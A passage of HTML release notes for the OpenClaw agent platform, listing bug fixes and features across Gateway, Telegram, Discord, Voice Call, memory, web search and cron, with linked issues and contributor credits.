href="https://github.com/mgh3326">@mgh3326</a>.</li>
<li>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</li>
<li>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</li>
<li>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</li>
<li>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet/Twilio/Voice Call: report missing dial-in details during setup, explain that Twilio needs a phone dial plan for Meet URLs, start the phone leg before Meet PIN DTMF, delay intro speech until after post-connect dialing, log each stage, and accept provider call IDs for gateway speak/continue while reporting ended-call state from history.</li>
<li>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</li>
<li>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</li>
<li>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</li>
<li>Telegram/DMs/network/commands: keep incidental <code>message_thread_id</code> reply-with-quote metadata on flat DM sessions unless topic isolation is configured, raise outbound text and typing Bot API guards to 60 seconds with safe timeout overrides and typing fallback retries, and register/clear command menus in default and group-chat scopes so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</li>
<li>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</li>
<li>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</li>
<li>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</li>
<li>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</li>
<li>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</li>
<li>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</li>
<li>Telegram/startup/models: use the existing <code>getMe</code> request guard and higher <code>timeoutSeconds</code> configs for slow Bot API paths, and make model picker confirmations say selections are session-scoped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</li>
<li>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</li>
<li>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</li>
<li>Heartbeat/scheduler: make heartbeat phase scheduling active-hours-aware so the scheduler seeks forward to the first in-window phase slot instead of arming timers for quiet-hours slots and relying solely on the runtime guard. Non-UTC <code>activeHours.timezone</code> values (e.g. <code>Asia/Shanghai</code>) now correctly influence when the next heartbeat timer fires, avoiding wasted quiet-hours ticks and long dormant gaps after gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363246759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75487/hovercard" href="https://github.com/openclaw/openclaw/issues/75487">#75487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>CLI/infer: reject local <code>codex/*</code> one-shot model probes before simple-completion dispatch and point operators at the Codex app-server runtime path instead of ending with an empty-output error.</li>
<li>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</li>
<li>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</li>
<li>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</li>
<li>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</li>
<li>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</li>
<li>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</li>
<li>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</li>
<li>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</li>
<li>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</li>
<li>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</li>
<li>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</li>
